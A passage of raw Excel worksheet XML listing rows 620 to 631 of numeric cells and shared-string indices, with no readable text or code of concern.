      </c>
      <c r="AD620">
        <v>0</v>
      </c>
      <c r="AE620">
        <v>0</v>
      </c>
      <c r="AF620" t="s">
        <v>4916</v>
      </c>
      <c r="AG620">
        <v>0</v>
      </c>
      <c r="AH620">
        <v>2</v>
      </c>
      <c r="AJ620">
        <v>53</v>
      </c>
      <c r="AK620" t="s">
        <v>4887</v>
      </c>
      <c r="AL620" t="s">
        <v>1583</v>
      </c>
      <c r="AM620" t="s">
        <v>4917</v>
      </c>
      <c r="AN620" t="s">
        <v>55</v>
      </c>
      <c r="AO620">
        <v>2004</v>
      </c>
      <c r="AP620" t="s">
        <v>4918</v>
      </c>
      <c r="AQ620" t="s">
        <v>4919</v>
      </c>
      <c r="AR620" t="s">
        <v>4920</v>
      </c>
      <c r="AS620" t="s">
        <v>179</v>
      </c>
      <c r="AT620" t="s">
        <v>58</v>
      </c>
      <c r="AU620">
        <v>26</v>
      </c>
      <c r="AV620">
        <v>1</v>
      </c>
      <c r="AW620">
        <v>0</v>
      </c>
      <c r="AX620">
        <v>0</v>
      </c>
      <c r="AY620">
        <v>15</v>
      </c>
      <c r="AZ620">
        <v>2</v>
      </c>
      <c r="BA620" t="s">
        <v>17119</v>
      </c>
      <c r="BB620" t="s">
        <v>15811</v>
      </c>
      <c r="BC620" t="s">
        <v>9611</v>
      </c>
      <c r="BD620" t="s">
        <v>9612</v>
      </c>
    </row>
    <row r="621" spans="1:56" x14ac:dyDescent="0.2">
      <c r="A621">
        <v>2533</v>
      </c>
      <c r="B621" t="s">
        <v>4921</v>
      </c>
      <c r="C621" t="s">
        <v>157</v>
      </c>
      <c r="D621" t="s">
        <v>4922</v>
      </c>
      <c r="E621" t="s">
        <v>142</v>
      </c>
      <c r="F621" t="s">
        <v>2374</v>
      </c>
      <c r="G621" s="1">
        <v>43875</v>
      </c>
      <c r="H621">
        <v>636</v>
      </c>
      <c r="I621">
        <v>636</v>
      </c>
      <c r="J621">
        <v>1</v>
      </c>
      <c r="K621">
        <v>0</v>
      </c>
      <c r="L621">
        <v>0</v>
      </c>
      <c r="M621">
        <v>0</v>
      </c>
      <c r="N621">
        <v>0</v>
      </c>
      <c r="O621">
        <v>0</v>
      </c>
      <c r="P621">
        <v>0</v>
      </c>
      <c r="Q621">
        <v>1</v>
      </c>
      <c r="R621">
        <v>0</v>
      </c>
      <c r="S621">
        <v>0</v>
      </c>
      <c r="T621">
        <v>1</v>
      </c>
      <c r="U621">
        <v>70000</v>
      </c>
      <c r="V621">
        <v>0</v>
      </c>
      <c r="W621">
        <v>0</v>
      </c>
      <c r="X621">
        <v>0</v>
      </c>
      <c r="Y621">
        <v>0</v>
      </c>
      <c r="Z621">
        <v>0</v>
      </c>
      <c r="AA621">
        <v>0</v>
      </c>
      <c r="AB621">
        <v>5300</v>
      </c>
      <c r="AC621">
        <v>0</v>
      </c>
      <c r="AD621">
        <v>0</v>
      </c>
      <c r="AE621">
        <v>5000</v>
      </c>
      <c r="AF621" t="s">
        <v>4923</v>
      </c>
      <c r="AG621">
        <v>61234</v>
      </c>
      <c r="AH621">
        <v>16</v>
      </c>
      <c r="AJ621">
        <v>242</v>
      </c>
      <c r="AK621" t="s">
        <v>1894</v>
      </c>
      <c r="AL621" t="s">
        <v>4337</v>
      </c>
      <c r="AM621" t="s">
        <v>4924</v>
      </c>
      <c r="AN621" t="s">
        <v>68</v>
      </c>
      <c r="AO621">
        <v>2019</v>
      </c>
      <c r="AP621">
        <v>811312773</v>
      </c>
      <c r="AQ621" t="s">
        <v>4925</v>
      </c>
      <c r="AR621" t="s">
        <v>4923</v>
      </c>
      <c r="AS621" t="s">
        <v>179</v>
      </c>
      <c r="AT621" t="s">
        <v>58</v>
      </c>
      <c r="AU621">
        <v>26</v>
      </c>
      <c r="AV621">
        <v>1</v>
      </c>
      <c r="AW621">
        <v>0</v>
      </c>
      <c r="AX621">
        <v>0</v>
      </c>
      <c r="AY621">
        <v>2</v>
      </c>
      <c r="AZ621">
        <v>1</v>
      </c>
      <c r="BA621" t="s">
        <v>17160</v>
      </c>
      <c r="BB621" t="s">
        <v>15852</v>
      </c>
      <c r="BC621" t="s">
        <v>9923</v>
      </c>
      <c r="BD621">
        <v>0</v>
      </c>
    </row>
    <row r="622" spans="1:56" x14ac:dyDescent="0.2">
      <c r="A622">
        <v>2361</v>
      </c>
      <c r="B622" t="s">
        <v>4926</v>
      </c>
      <c r="C622" t="s">
        <v>157</v>
      </c>
      <c r="D622" t="s">
        <v>4927</v>
      </c>
      <c r="E622" t="s">
        <v>142</v>
      </c>
      <c r="F622" t="s">
        <v>4928</v>
      </c>
      <c r="G622" s="1">
        <v>44071</v>
      </c>
      <c r="H622">
        <v>642</v>
      </c>
      <c r="I622">
        <v>642</v>
      </c>
      <c r="J622">
        <v>2</v>
      </c>
      <c r="K622">
        <v>0</v>
      </c>
      <c r="L622">
        <v>1</v>
      </c>
      <c r="M622">
        <v>0</v>
      </c>
      <c r="N622">
        <v>0</v>
      </c>
      <c r="O622">
        <v>0</v>
      </c>
      <c r="P622">
        <v>0</v>
      </c>
      <c r="Q622">
        <v>0</v>
      </c>
      <c r="R622">
        <v>0</v>
      </c>
      <c r="S622">
        <v>0</v>
      </c>
      <c r="T622">
        <v>0</v>
      </c>
      <c r="U622">
        <v>3000000</v>
      </c>
      <c r="V622">
        <v>0</v>
      </c>
      <c r="W622">
        <v>1000000</v>
      </c>
      <c r="X622">
        <v>0</v>
      </c>
      <c r="Y622">
        <v>0</v>
      </c>
      <c r="Z622">
        <v>0</v>
      </c>
      <c r="AA622">
        <v>0</v>
      </c>
      <c r="AB622">
        <v>0</v>
      </c>
      <c r="AC622">
        <v>0</v>
      </c>
      <c r="AD622">
        <v>0</v>
      </c>
      <c r="AE622">
        <v>0</v>
      </c>
      <c r="AF622" t="s">
        <v>4929</v>
      </c>
      <c r="AG622">
        <v>60183</v>
      </c>
      <c r="AH622">
        <v>16</v>
      </c>
      <c r="AJ622">
        <v>264</v>
      </c>
      <c r="AK622" t="s">
        <v>211</v>
      </c>
      <c r="AL622" t="s">
        <v>2882</v>
      </c>
      <c r="AM622" t="s">
        <v>4930</v>
      </c>
      <c r="AN622" t="s">
        <v>55</v>
      </c>
      <c r="AO622">
        <v>2004</v>
      </c>
      <c r="AP622" t="s">
        <v>4931</v>
      </c>
      <c r="AQ622" t="s">
        <v>4932</v>
      </c>
      <c r="AR622" t="s">
        <v>4933</v>
      </c>
      <c r="AS622" t="s">
        <v>71</v>
      </c>
      <c r="AT622" t="s">
        <v>58</v>
      </c>
      <c r="AU622">
        <v>26</v>
      </c>
      <c r="AV622">
        <v>0</v>
      </c>
      <c r="AW622">
        <v>13</v>
      </c>
      <c r="AX622">
        <v>0</v>
      </c>
      <c r="AY622">
        <v>27</v>
      </c>
      <c r="AZ622">
        <v>7</v>
      </c>
      <c r="BA622" t="s">
        <v>17147</v>
      </c>
      <c r="BB622">
        <v>0</v>
      </c>
      <c r="BC622" t="s">
        <v>11200</v>
      </c>
      <c r="BD622" t="s">
        <v>10000</v>
      </c>
    </row>
    <row r="623" spans="1:56" x14ac:dyDescent="0.2">
      <c r="A623">
        <v>2066</v>
      </c>
      <c r="B623" t="s">
        <v>4934</v>
      </c>
      <c r="C623" t="s">
        <v>88</v>
      </c>
      <c r="D623" t="s">
        <v>4935</v>
      </c>
      <c r="E623" t="s">
        <v>479</v>
      </c>
      <c r="F623" t="s">
        <v>4936</v>
      </c>
      <c r="G623" s="1">
        <v>43851</v>
      </c>
      <c r="H623">
        <v>650</v>
      </c>
      <c r="I623">
        <v>650</v>
      </c>
      <c r="J623">
        <v>0</v>
      </c>
      <c r="K623">
        <v>1</v>
      </c>
      <c r="L623">
        <v>0</v>
      </c>
      <c r="M623">
        <v>0</v>
      </c>
      <c r="N623">
        <v>0</v>
      </c>
      <c r="O623">
        <v>0</v>
      </c>
      <c r="P623">
        <v>0</v>
      </c>
      <c r="Q623">
        <v>0</v>
      </c>
      <c r="R623">
        <v>0</v>
      </c>
      <c r="S623">
        <v>0</v>
      </c>
      <c r="T623">
        <v>1</v>
      </c>
      <c r="U623">
        <v>0</v>
      </c>
      <c r="V623">
        <v>3000</v>
      </c>
      <c r="W623">
        <v>0</v>
      </c>
      <c r="X623">
        <v>0</v>
      </c>
      <c r="Y623">
        <v>0</v>
      </c>
      <c r="Z623">
        <v>0</v>
      </c>
      <c r="AA623">
        <v>0</v>
      </c>
      <c r="AB623">
        <v>0</v>
      </c>
      <c r="AC623">
        <v>0</v>
      </c>
      <c r="AD623">
        <v>0</v>
      </c>
      <c r="AE623">
        <v>100</v>
      </c>
      <c r="AF623" t="s">
        <v>4937</v>
      </c>
      <c r="AG623">
        <v>80223</v>
      </c>
      <c r="AH623">
        <v>17</v>
      </c>
      <c r="AJ623">
        <v>282</v>
      </c>
      <c r="AK623" t="s">
        <v>592</v>
      </c>
      <c r="AL623" t="s">
        <v>1903</v>
      </c>
      <c r="AM623" t="s">
        <v>4938</v>
      </c>
      <c r="AN623" t="s">
        <v>82</v>
      </c>
      <c r="AO623">
        <v>0</v>
      </c>
      <c r="AP623">
        <v>81293723335</v>
      </c>
      <c r="AQ623" t="s">
        <v>4939</v>
      </c>
      <c r="AR623" t="s">
        <v>4937</v>
      </c>
      <c r="AS623" t="s">
        <v>71</v>
      </c>
      <c r="AT623" t="s">
        <v>58</v>
      </c>
      <c r="AU623">
        <v>25</v>
      </c>
      <c r="AV623">
        <v>1</v>
      </c>
      <c r="AW623">
        <v>12</v>
      </c>
      <c r="AX623">
        <v>0</v>
      </c>
      <c r="AY623">
        <v>8</v>
      </c>
      <c r="AZ623">
        <v>0</v>
      </c>
      <c r="BA623" t="s">
        <v>17053</v>
      </c>
      <c r="BB623" t="s">
        <v>15678</v>
      </c>
      <c r="BC623">
        <v>0</v>
      </c>
      <c r="BD623">
        <v>0</v>
      </c>
    </row>
    <row r="624" spans="1:56" x14ac:dyDescent="0.2">
      <c r="A624">
        <v>2244</v>
      </c>
      <c r="B624" t="s">
        <v>4940</v>
      </c>
      <c r="C624" t="s">
        <v>872</v>
      </c>
      <c r="D624" t="s">
        <v>4941</v>
      </c>
      <c r="E624" t="s">
        <v>142</v>
      </c>
      <c r="F624" t="s">
        <v>4942</v>
      </c>
      <c r="G624" s="1">
        <v>43888</v>
      </c>
      <c r="H624">
        <v>694</v>
      </c>
      <c r="I624">
        <v>694</v>
      </c>
      <c r="J624">
        <v>4</v>
      </c>
      <c r="K624">
        <v>4</v>
      </c>
      <c r="L624">
        <v>3</v>
      </c>
      <c r="M624">
        <v>0</v>
      </c>
      <c r="N624">
        <v>0</v>
      </c>
      <c r="O624">
        <v>0</v>
      </c>
      <c r="P624">
        <v>0</v>
      </c>
      <c r="Q624">
        <v>0</v>
      </c>
      <c r="R624">
        <v>0</v>
      </c>
      <c r="S624">
        <v>1</v>
      </c>
      <c r="T624">
        <v>3</v>
      </c>
      <c r="U624">
        <v>300000</v>
      </c>
      <c r="V624">
        <v>4</v>
      </c>
      <c r="W624">
        <v>12000</v>
      </c>
      <c r="X624">
        <v>0</v>
      </c>
      <c r="Y624">
        <v>0</v>
      </c>
      <c r="Z624">
        <v>0</v>
      </c>
      <c r="AA624">
        <v>0</v>
      </c>
      <c r="AB624">
        <v>0</v>
      </c>
      <c r="AC624">
        <v>0</v>
      </c>
      <c r="AD624">
        <v>1</v>
      </c>
      <c r="AE624">
        <v>0</v>
      </c>
      <c r="AF624" t="s">
        <v>4943</v>
      </c>
      <c r="AG624">
        <v>94711</v>
      </c>
      <c r="AH624">
        <v>28</v>
      </c>
      <c r="AJ624">
        <v>387</v>
      </c>
      <c r="AK624" t="s">
        <v>876</v>
      </c>
      <c r="AL624" t="s">
        <v>4944</v>
      </c>
      <c r="AM624" t="s">
        <v>4945</v>
      </c>
      <c r="AN624" t="s">
        <v>55</v>
      </c>
      <c r="AO624">
        <v>2003</v>
      </c>
      <c r="AP624" t="s">
        <v>4946</v>
      </c>
      <c r="AQ624" t="s">
        <v>4947</v>
      </c>
      <c r="AR624" t="s">
        <v>4943</v>
      </c>
      <c r="AS624" t="s">
        <v>71</v>
      </c>
      <c r="AT624" t="s">
        <v>58</v>
      </c>
      <c r="AU624">
        <v>0</v>
      </c>
      <c r="AV624">
        <v>0</v>
      </c>
      <c r="AW624">
        <v>34</v>
      </c>
      <c r="AX624">
        <v>79</v>
      </c>
      <c r="AY624">
        <v>14</v>
      </c>
      <c r="AZ624">
        <v>30</v>
      </c>
      <c r="BA624" t="s">
        <v>17099</v>
      </c>
      <c r="BB624" t="s">
        <v>15785</v>
      </c>
      <c r="BC624" t="s">
        <v>10010</v>
      </c>
      <c r="BD624" t="s">
        <v>10012</v>
      </c>
    </row>
    <row r="625" spans="1:56" x14ac:dyDescent="0.2">
      <c r="A625">
        <v>2524</v>
      </c>
      <c r="B625" t="s">
        <v>4948</v>
      </c>
      <c r="C625" t="s">
        <v>74</v>
      </c>
      <c r="D625" t="s">
        <v>4949</v>
      </c>
      <c r="E625" t="s">
        <v>142</v>
      </c>
      <c r="F625" t="s">
        <v>4950</v>
      </c>
      <c r="G625" s="1">
        <v>43962</v>
      </c>
      <c r="H625">
        <v>717</v>
      </c>
      <c r="I625">
        <v>717</v>
      </c>
      <c r="J625">
        <v>0</v>
      </c>
      <c r="K625">
        <v>4</v>
      </c>
      <c r="L625">
        <v>1</v>
      </c>
      <c r="M625">
        <v>2</v>
      </c>
      <c r="N625">
        <v>0</v>
      </c>
      <c r="O625">
        <v>0</v>
      </c>
      <c r="P625">
        <v>0</v>
      </c>
      <c r="Q625">
        <v>0</v>
      </c>
      <c r="R625">
        <v>4</v>
      </c>
      <c r="S625">
        <v>0</v>
      </c>
      <c r="T625">
        <v>0</v>
      </c>
      <c r="U625">
        <v>0</v>
      </c>
      <c r="V625">
        <v>40000</v>
      </c>
      <c r="W625">
        <v>2000</v>
      </c>
      <c r="X625">
        <v>3000</v>
      </c>
      <c r="Y625">
        <v>0</v>
      </c>
      <c r="Z625">
        <v>0</v>
      </c>
      <c r="AA625">
        <v>0</v>
      </c>
      <c r="AB625">
        <v>0</v>
      </c>
      <c r="AC625">
        <v>1000</v>
      </c>
      <c r="AD625">
        <v>0</v>
      </c>
      <c r="AE625">
        <v>0</v>
      </c>
      <c r="AF625" t="s">
        <v>4951</v>
      </c>
      <c r="AG625">
        <v>50117</v>
      </c>
      <c r="AH625">
        <v>14</v>
      </c>
      <c r="AJ625">
        <v>220</v>
      </c>
      <c r="AK625" t="s">
        <v>2654</v>
      </c>
      <c r="AL625" t="s">
        <v>4952</v>
      </c>
      <c r="AM625" t="s">
        <v>4953</v>
      </c>
      <c r="AN625" t="s">
        <v>55</v>
      </c>
      <c r="AO625">
        <v>2004</v>
      </c>
      <c r="AP625">
        <v>81901873396</v>
      </c>
      <c r="AQ625" t="s">
        <v>4954</v>
      </c>
      <c r="AR625" t="s">
        <v>4955</v>
      </c>
      <c r="AS625" t="s">
        <v>71</v>
      </c>
      <c r="AT625" t="s">
        <v>58</v>
      </c>
      <c r="AU625">
        <v>0</v>
      </c>
      <c r="AV625">
        <v>0</v>
      </c>
      <c r="AW625">
        <v>0</v>
      </c>
      <c r="AX625">
        <v>40</v>
      </c>
      <c r="AY625">
        <v>2</v>
      </c>
      <c r="AZ625">
        <v>2</v>
      </c>
      <c r="BA625" t="s">
        <v>17150</v>
      </c>
      <c r="BB625" t="s">
        <v>15859</v>
      </c>
      <c r="BC625">
        <v>0</v>
      </c>
      <c r="BD625" t="s">
        <v>9973</v>
      </c>
    </row>
    <row r="626" spans="1:56" x14ac:dyDescent="0.2">
      <c r="A626">
        <v>1823</v>
      </c>
      <c r="B626" t="s">
        <v>4956</v>
      </c>
      <c r="C626" t="s">
        <v>318</v>
      </c>
      <c r="D626" t="s">
        <v>4957</v>
      </c>
      <c r="E626" t="s">
        <v>111</v>
      </c>
      <c r="F626" t="s">
        <v>4958</v>
      </c>
      <c r="G626" s="1">
        <v>44382</v>
      </c>
      <c r="H626">
        <v>723</v>
      </c>
      <c r="I626">
        <v>723</v>
      </c>
      <c r="J626">
        <v>2</v>
      </c>
      <c r="K626">
        <v>0</v>
      </c>
      <c r="L626">
        <v>2</v>
      </c>
      <c r="M626">
        <v>0</v>
      </c>
      <c r="N626">
        <v>0</v>
      </c>
      <c r="O626">
        <v>0</v>
      </c>
      <c r="P626">
        <v>0</v>
      </c>
      <c r="Q626">
        <v>0</v>
      </c>
      <c r="R626">
        <v>0</v>
      </c>
      <c r="S626">
        <v>0</v>
      </c>
      <c r="T626">
        <v>0</v>
      </c>
      <c r="U626">
        <v>150000</v>
      </c>
      <c r="V626">
        <v>0</v>
      </c>
      <c r="W626">
        <v>4000</v>
      </c>
      <c r="X626">
        <v>0</v>
      </c>
      <c r="Y626">
        <v>0</v>
      </c>
      <c r="Z626">
        <v>0</v>
      </c>
      <c r="AA626">
        <v>0</v>
      </c>
      <c r="AB626">
        <v>0</v>
      </c>
      <c r="AC626">
        <v>0</v>
      </c>
      <c r="AD626">
        <v>0</v>
      </c>
      <c r="AE626">
        <v>0</v>
      </c>
      <c r="AF626" t="s">
        <v>4959</v>
      </c>
      <c r="AG626">
        <v>90244</v>
      </c>
      <c r="AH626">
        <v>26</v>
      </c>
      <c r="AJ626">
        <v>420</v>
      </c>
      <c r="AK626" t="s">
        <v>936</v>
      </c>
      <c r="AL626" t="s">
        <v>937</v>
      </c>
      <c r="AM626" t="s">
        <v>4960</v>
      </c>
      <c r="AN626" t="s">
        <v>55</v>
      </c>
      <c r="AO626">
        <v>2011</v>
      </c>
      <c r="AP626" t="s">
        <v>4961</v>
      </c>
      <c r="AQ626" t="s">
        <v>4962</v>
      </c>
      <c r="AR626" t="s">
        <v>4963</v>
      </c>
      <c r="AS626" t="s">
        <v>71</v>
      </c>
      <c r="AT626" t="s">
        <v>58</v>
      </c>
      <c r="AU626">
        <v>26</v>
      </c>
      <c r="AV626">
        <v>1</v>
      </c>
      <c r="AW626">
        <v>68</v>
      </c>
      <c r="AX626">
        <v>71</v>
      </c>
      <c r="AY626">
        <v>12</v>
      </c>
      <c r="AZ626">
        <v>9</v>
      </c>
      <c r="BA626" t="s">
        <v>17006</v>
      </c>
      <c r="BB626" t="s">
        <v>15538</v>
      </c>
      <c r="BC626" t="s">
        <v>9522</v>
      </c>
      <c r="BD626" t="s">
        <v>9832</v>
      </c>
    </row>
    <row r="627" spans="1:56" x14ac:dyDescent="0.2">
      <c r="A627">
        <v>2553</v>
      </c>
      <c r="B627" t="s">
        <v>4964</v>
      </c>
      <c r="C627" t="s">
        <v>74</v>
      </c>
      <c r="D627" t="s">
        <v>4965</v>
      </c>
      <c r="E627" t="s">
        <v>142</v>
      </c>
      <c r="F627" t="s">
        <v>4966</v>
      </c>
      <c r="G627" s="1">
        <v>44302</v>
      </c>
      <c r="H627">
        <v>732</v>
      </c>
      <c r="I627">
        <v>732</v>
      </c>
      <c r="J627">
        <v>7</v>
      </c>
      <c r="K627">
        <v>0</v>
      </c>
      <c r="L627">
        <v>5</v>
      </c>
      <c r="M627">
        <v>4</v>
      </c>
      <c r="N627">
        <v>0</v>
      </c>
      <c r="O627">
        <v>0</v>
      </c>
      <c r="P627">
        <v>0</v>
      </c>
      <c r="Q627">
        <v>0</v>
      </c>
      <c r="R627">
        <v>11</v>
      </c>
      <c r="S627">
        <v>0</v>
      </c>
      <c r="T627">
        <v>0</v>
      </c>
      <c r="U627">
        <v>2450</v>
      </c>
      <c r="V627">
        <v>0</v>
      </c>
      <c r="W627">
        <v>12000</v>
      </c>
      <c r="X627">
        <v>6000</v>
      </c>
      <c r="Y627">
        <v>0</v>
      </c>
      <c r="Z627">
        <v>0</v>
      </c>
      <c r="AA627">
        <v>0</v>
      </c>
      <c r="AB627">
        <v>0</v>
      </c>
      <c r="AC627">
        <v>13000</v>
      </c>
      <c r="AD627">
        <v>0</v>
      </c>
      <c r="AE627">
        <v>0</v>
      </c>
      <c r="AF627" t="s">
        <v>4967</v>
      </c>
      <c r="AG627">
        <v>59252</v>
      </c>
      <c r="AH627">
        <v>14</v>
      </c>
      <c r="AJ627">
        <v>204</v>
      </c>
      <c r="AK627" t="s">
        <v>1556</v>
      </c>
      <c r="AL627" t="s">
        <v>1939</v>
      </c>
      <c r="AM627" t="s">
        <v>4968</v>
      </c>
      <c r="AN627" t="s">
        <v>55</v>
      </c>
      <c r="AO627">
        <v>2015</v>
      </c>
      <c r="AP627" t="s">
        <v>4969</v>
      </c>
      <c r="AQ627" t="s">
        <v>4970</v>
      </c>
      <c r="AR627" t="s">
        <v>4967</v>
      </c>
      <c r="AS627" t="s">
        <v>71</v>
      </c>
      <c r="AT627" t="s">
        <v>58</v>
      </c>
      <c r="AU627">
        <v>26</v>
      </c>
      <c r="AV627">
        <v>1</v>
      </c>
      <c r="AW627">
        <v>86</v>
      </c>
      <c r="AX627">
        <v>300</v>
      </c>
      <c r="AY627">
        <v>25</v>
      </c>
      <c r="AZ627">
        <v>35</v>
      </c>
      <c r="BA627" t="s">
        <v>16663</v>
      </c>
      <c r="BB627" t="s">
        <v>15854</v>
      </c>
      <c r="BC627" t="s">
        <v>9993</v>
      </c>
      <c r="BD627" t="s">
        <v>9994</v>
      </c>
    </row>
    <row r="628" spans="1:56" x14ac:dyDescent="0.2">
      <c r="A628">
        <v>2558</v>
      </c>
      <c r="B628" t="s">
        <v>4971</v>
      </c>
      <c r="C628" t="s">
        <v>99</v>
      </c>
      <c r="D628" t="s">
        <v>4972</v>
      </c>
      <c r="E628" t="s">
        <v>111</v>
      </c>
      <c r="F628" t="s">
        <v>4973</v>
      </c>
      <c r="G628" s="1">
        <v>43868</v>
      </c>
      <c r="H628">
        <v>756</v>
      </c>
      <c r="I628">
        <v>756</v>
      </c>
      <c r="J628">
        <v>1</v>
      </c>
      <c r="K628">
        <v>0</v>
      </c>
      <c r="L628">
        <v>2</v>
      </c>
      <c r="M628">
        <v>0</v>
      </c>
      <c r="N628">
        <v>0</v>
      </c>
      <c r="O628">
        <v>0</v>
      </c>
      <c r="P628">
        <v>0</v>
      </c>
      <c r="Q628">
        <v>0</v>
      </c>
      <c r="R628">
        <v>0</v>
      </c>
      <c r="S628">
        <v>0</v>
      </c>
      <c r="T628">
        <v>1</v>
      </c>
      <c r="U628">
        <v>500000</v>
      </c>
      <c r="V628">
        <v>0</v>
      </c>
      <c r="W628">
        <v>5000</v>
      </c>
      <c r="X628">
        <v>0</v>
      </c>
      <c r="Y628">
        <v>0</v>
      </c>
      <c r="Z628">
        <v>0</v>
      </c>
      <c r="AA628">
        <v>0</v>
      </c>
      <c r="AB628">
        <v>0</v>
      </c>
      <c r="AC628">
        <v>0</v>
      </c>
      <c r="AD628">
        <v>0</v>
      </c>
      <c r="AE628">
        <v>100000</v>
      </c>
      <c r="AF628" t="s">
        <v>4974</v>
      </c>
      <c r="AG628">
        <v>14310</v>
      </c>
      <c r="AH628">
        <v>12</v>
      </c>
      <c r="AJ628">
        <v>160</v>
      </c>
      <c r="AK628" t="s">
        <v>268</v>
      </c>
      <c r="AL628" t="s">
        <v>268</v>
      </c>
      <c r="AM628" t="s">
        <v>4975</v>
      </c>
      <c r="AN628" t="s">
        <v>82</v>
      </c>
      <c r="AO628">
        <v>1967</v>
      </c>
      <c r="AP628" t="s">
        <v>270</v>
      </c>
      <c r="AQ628" t="s">
        <v>271</v>
      </c>
      <c r="AR628" t="s">
        <v>4976</v>
      </c>
      <c r="AS628" t="s">
        <v>71</v>
      </c>
      <c r="AT628" t="s">
        <v>86</v>
      </c>
      <c r="AU628">
        <v>0</v>
      </c>
      <c r="AV628">
        <v>0</v>
      </c>
      <c r="AW628">
        <v>25</v>
      </c>
      <c r="AX628">
        <v>85</v>
      </c>
      <c r="AY628">
        <v>10</v>
      </c>
      <c r="AZ628">
        <v>25</v>
      </c>
      <c r="BA628" t="s">
        <v>17182</v>
      </c>
      <c r="BB628" t="e">
        <v>#N/A</v>
      </c>
      <c r="BC628" t="s">
        <v>10238</v>
      </c>
      <c r="BD628" t="s">
        <v>10002</v>
      </c>
    </row>
    <row r="629" spans="1:56" x14ac:dyDescent="0.2">
      <c r="A629">
        <v>2142</v>
      </c>
      <c r="B629" t="s">
        <v>4977</v>
      </c>
      <c r="C629" t="s">
        <v>129</v>
      </c>
      <c r="D629" t="s">
        <v>4978</v>
      </c>
      <c r="E629" t="s">
        <v>111</v>
      </c>
      <c r="F629" t="s">
        <v>4979</v>
      </c>
      <c r="G629" s="1">
        <v>43853</v>
      </c>
      <c r="H629">
        <v>759</v>
      </c>
      <c r="I629">
        <v>759</v>
      </c>
      <c r="J629">
        <v>1</v>
      </c>
      <c r="K629">
        <v>0</v>
      </c>
      <c r="L629">
        <v>0</v>
      </c>
      <c r="M629">
        <v>0</v>
      </c>
      <c r="N629">
        <v>0</v>
      </c>
      <c r="O629">
        <v>0</v>
      </c>
      <c r="P629">
        <v>0</v>
      </c>
      <c r="Q629">
        <v>0</v>
      </c>
      <c r="R629">
        <v>0</v>
      </c>
      <c r="S629">
        <v>0</v>
      </c>
      <c r="T629">
        <v>0</v>
      </c>
      <c r="U629">
        <v>158000</v>
      </c>
      <c r="V629">
        <v>0</v>
      </c>
      <c r="W629">
        <v>0</v>
      </c>
      <c r="X629">
        <v>0</v>
      </c>
      <c r="Y629">
        <v>0</v>
      </c>
      <c r="Z629">
        <v>0</v>
      </c>
      <c r="AA629">
        <v>0</v>
      </c>
      <c r="AB629">
        <v>0</v>
      </c>
      <c r="AC629">
        <v>0</v>
      </c>
      <c r="AD629">
        <v>0</v>
      </c>
      <c r="AE629">
        <v>0</v>
      </c>
      <c r="AF629" t="s">
        <v>4980</v>
      </c>
      <c r="AG629">
        <v>0</v>
      </c>
      <c r="AH629">
        <v>11</v>
      </c>
      <c r="AJ629">
        <v>268</v>
      </c>
      <c r="AK629" t="s">
        <v>4981</v>
      </c>
      <c r="AL629" t="s">
        <v>4982</v>
      </c>
      <c r="AM629" t="s">
        <v>4983</v>
      </c>
      <c r="AN629" t="s">
        <v>288</v>
      </c>
      <c r="AO629">
        <v>2002</v>
      </c>
      <c r="AP629">
        <v>317534411</v>
      </c>
      <c r="AQ629" t="s">
        <v>4984</v>
      </c>
      <c r="AR629" t="s">
        <v>4985</v>
      </c>
      <c r="AU629">
        <v>25</v>
      </c>
      <c r="AV629">
        <v>1</v>
      </c>
      <c r="AW629">
        <v>0</v>
      </c>
      <c r="AX629">
        <v>0</v>
      </c>
      <c r="AY629">
        <v>2</v>
      </c>
      <c r="AZ629">
        <v>1</v>
      </c>
      <c r="BA629" t="s">
        <v>16790</v>
      </c>
      <c r="BB629" t="s">
        <v>15009</v>
      </c>
      <c r="BC629" t="s">
        <v>9766</v>
      </c>
      <c r="BD629">
        <v>0</v>
      </c>
    </row>
    <row r="630" spans="1:56" x14ac:dyDescent="0.2">
      <c r="A630">
        <v>2559</v>
      </c>
      <c r="B630" t="s">
        <v>4986</v>
      </c>
      <c r="C630" t="s">
        <v>47</v>
      </c>
      <c r="D630" t="s">
        <v>4987</v>
      </c>
      <c r="E630" t="s">
        <v>49</v>
      </c>
      <c r="F630" t="s">
        <v>4988</v>
      </c>
      <c r="G630" s="1">
        <v>43992</v>
      </c>
      <c r="H630">
        <v>772</v>
      </c>
      <c r="I630">
        <v>772</v>
      </c>
      <c r="J630">
        <v>0</v>
      </c>
      <c r="K630">
        <v>0</v>
      </c>
      <c r="L630">
        <v>0</v>
      </c>
      <c r="M630">
        <v>0</v>
      </c>
      <c r="N630">
        <v>0</v>
      </c>
      <c r="O630">
        <v>0</v>
      </c>
      <c r="P630">
        <v>0</v>
      </c>
      <c r="Q630">
        <v>1</v>
      </c>
      <c r="R630">
        <v>1</v>
      </c>
      <c r="S630">
        <v>0</v>
      </c>
      <c r="T630">
        <v>1</v>
      </c>
      <c r="U630">
        <v>0</v>
      </c>
      <c r="V630">
        <v>0</v>
      </c>
      <c r="W630">
        <v>0</v>
      </c>
      <c r="X630">
        <v>0</v>
      </c>
      <c r="Y630">
        <v>0</v>
      </c>
      <c r="Z630">
        <v>0</v>
      </c>
      <c r="AA630">
        <v>0</v>
      </c>
      <c r="AB630">
        <v>300</v>
      </c>
      <c r="AC630">
        <v>500</v>
      </c>
      <c r="AD630">
        <v>0</v>
      </c>
      <c r="AE630">
        <v>2000</v>
      </c>
      <c r="AF630">
        <v>81260128111</v>
      </c>
      <c r="AG630">
        <v>20361</v>
      </c>
      <c r="AH630">
        <v>2</v>
      </c>
      <c r="AJ630">
        <v>35</v>
      </c>
      <c r="AK630" t="s">
        <v>4989</v>
      </c>
      <c r="AL630" t="s">
        <v>4990</v>
      </c>
      <c r="AM630" t="s">
        <v>4991</v>
      </c>
      <c r="AN630" t="s">
        <v>68</v>
      </c>
      <c r="AO630">
        <v>1990</v>
      </c>
      <c r="AP630">
        <v>81260128111</v>
      </c>
      <c r="AQ630" t="s">
        <v>4992</v>
      </c>
      <c r="AR630" t="s">
        <v>4993</v>
      </c>
      <c r="AS630" t="s">
        <v>57</v>
      </c>
      <c r="AT630" t="s">
        <v>58</v>
      </c>
      <c r="AU630">
        <v>7</v>
      </c>
      <c r="AV630">
        <v>0</v>
      </c>
      <c r="AW630">
        <v>0</v>
      </c>
      <c r="AX630">
        <v>0</v>
      </c>
      <c r="AY630">
        <v>8</v>
      </c>
      <c r="AZ630">
        <v>1</v>
      </c>
      <c r="BA630" t="s">
        <v>17180</v>
      </c>
      <c r="BB630" t="s">
        <v>15855</v>
      </c>
      <c r="BC630">
        <v>0</v>
      </c>
      <c r="BD630" t="s">
        <v>10958</v>
      </c>
    </row>
    <row r="631" spans="1:56" x14ac:dyDescent="0.2">
      <c r="A631">
        <v>2196</v>
      </c>
